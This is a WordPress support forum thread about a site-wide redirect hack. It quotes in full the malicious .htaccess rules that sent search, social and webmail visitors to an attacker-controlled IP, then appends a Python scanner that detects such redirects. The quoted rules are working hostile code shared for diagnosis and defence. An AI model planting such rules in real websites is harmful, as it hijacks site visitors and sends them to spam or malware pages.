I just went to your site and I don’t see any links leading to external sites. Has this been fixed already?
I’m new to posting in Forums so forgive me. Where do I start a new thread/topic? As it is, I’m having the same problem today at http://www.customstickermakers.com.
All links are now redirecting to the home page. Yesterday, I had a string of emails from Wordfence alerting me to multiple lockouts due to too many login attempts. I identified the range of IP addresses and blocked it; however, I’m thinking that wasn’t enough.
Definitely need support in this.
Thread Starter
axiaer
(@axiaer)
Hi Senff,
Thanks for viewing the site. No, the issue has not been fixed; apparently I’m still getting the redirect. Please find attached my attempt to capture the three transactions.
Here is a case for testing:
Test Domain
First, when you click on any link
Image 01
Then there is a redirect to “46.161.41.162/sds/go.php?sid=1”
Image 02
Then the page is redirected to “doctorsro.com”
Image 03
The domain http://indulgebeautystudio.co.uk/ appears to start working again after reinstallation of a fresh copy, but is there any easier way to go about it?
Hope that helps in understanding and finding a resolution.
For whatever it’s worth, I just deleted my .htaccess file and reset the permalinks. Fixed it…
Thread Starter
axiaer
(@axiaer)
@melimojo You are brilliant. I believe this is some sort of sick SEO hack; all the websites which were using a .htaccess file for URL rewriting were affected, as all the .htaccess files were infected.
Thanks a lot, I’m happy to mark this issue as resolved. I’m attaching the following hack code for your reference and necessary action for future WordPress updates.
Following is the code injected into the .htaccess file:
```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(inbox|spam|mail).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
</IfModule>
ErrorDocument 404 http://46.161.41.152/sds/go.php?sid=1
```
Please make sure the rest of your site is not hacked. Although you fixed the .htaccess file, it doesn’t mean your site is clean now.
Changing the .htaccess file is just one way of hacking it — if they got access to that, there’s a good chance they had access to other things (and infected those) as well.
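A defensive check for the pattern in the injected .htaccess quoted above, added here as an example and not written by anyone in this thread: it flags a `RewriteRule` that sends visitors to a foreign host when gated on `HTTP_REFERER`, and an `ErrorDocument` pointing off-site. The function names, the `own_hosts` parameter, `example.com` and the shortened sample file are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the rules quoted in the thread (referer list shortened).
SAMPLE = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
</IfModule>
ErrorDocument 404 http://46.161.41.152/sds/go.php?sid=1
"""

def external_host(target, own_hosts):
    """Return the host of an absolute URL unless it is one of the site's own hosts."""
    host = urlparse(target).hostname if re.match(r"https?://", target, re.I) else None
    return host if host and host.lower() not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line number, finding, host) tuples for off-site redirects in .htaccess text."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond":
            # Conditions accumulate until the next RewriteRule, which consumes them.
            referer_cond = referer_cond or (len(parts) > 1 and "http_referer" in parts[1].lower())
        elif directive == "rewriterule":
            host = external_host(parts[2], own) if len(parts) > 2 else None
            if host:
                kind = "referer-gated redirect" if referer_cond else "external redirect"
                findings.append((lineno, kind, host))
            referer_cond = False
        elif directive == "errordocument" and len(parts) > 2:
            host = external_host(parts[2], own)
            if host:
                findings.append((lineno, "external ErrorDocument", host))
    return findings

if __name__ == "__main__":
    print(scan_htaccess(SAMPLE, own_hosts=["example.com"]))
```

Run it over every .htaccess under the web root, not only the top-level one, and treat any hit as a reason to audit the rest of the install as the last reply advises.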